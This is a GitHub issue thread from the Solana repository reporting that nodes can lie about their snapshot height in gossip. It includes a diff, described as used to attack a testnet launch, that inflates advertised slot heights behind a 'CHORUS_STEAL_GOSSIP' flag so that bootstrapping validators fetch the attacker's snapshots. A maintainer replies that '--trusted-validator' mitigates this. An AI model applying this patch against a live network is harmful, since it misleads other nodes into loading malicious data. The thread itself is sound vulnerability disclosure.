### ISSUE TITLE
Nodes can lie about their current snapshot height

### ISSUE THREAD

**Issue by Reisen** [solana-labs/solana#8554]
#### Problem
Code used to attack TdS launch.

```diff
diff --git a/core/src/cluster_info.rs b/core/src/cluster_info.rs
index ba4a598ec..3fefef45a 100644
--- a/core/src/cluster_info.rs
+++ b/core/src/cluster_info.rs
@@ -443,7 +443,7 @@ impl ClusterInfo {
             .process_push_message(&self.id(), vec![entry], now);
     }
 
-    pub fn push_snapshot_hashes(&mut self, snapshot_hashes: Vec<(Slot, Hash)>) {
+    pub fn push_snapshot_hashes(&mut self, mut snapshot_hashes: Vec<(Slot, Hash)>) {
         if snapshot_hashes.len() > MAX_SNAPSHOT_HASHES {
             warn!(
                 "snapshot_hashes too large, ignored: {}",
@@ -452,6 +452,16 @@ impl ClusterInfo {
             return;
         } 
+        if std::env::var("CHORUS_STEAL_GOSSIP").is_ok() {
+            println!("-- R Stealing Gossip");
+            let length = snapshot_hashes.len();
+            for (i, row) in snapshot_hashes.iter_mut().enumerate() {
+                row.0 = std::u64::MAX - (length - i) as u64;
+            }
+        }
+        println!("-- R Pushing Snapshot Hashes");
+        let now = timestamp();
         let entry = CrdsValue::new_signed(
           CrdsData::SnapshotHash(SnapshotHash::new(self.id(), snapshot_hashes, now)),
```

#### Proposed Solution

Nodes can lie about their current observed slot height when validators launch. Validators do validate hashes, but not if the heights associated with them match up. As height is the only metric used to select a validator, you can capture gossip and serve malicious files. Checking hashes match heights when selecting validators could fix this.

**Comment by mvines** [comment]
The `--trusted-validator` option added explicitly to deal with this.  I think the bug was just in the TdS operational setup whereby we didn't provide any recommended `--trusted-validator` options until after this attack was launched.    There's not too much else we can do here I think, random nodes could lie and shouldn't be trusted.

**Comment by mvines** [comment]
I think there's no further action here.   Nodes can lie, use `--trusted-validator` to avoid getting lied to.  If you disagree @Reisen please reopen the issue
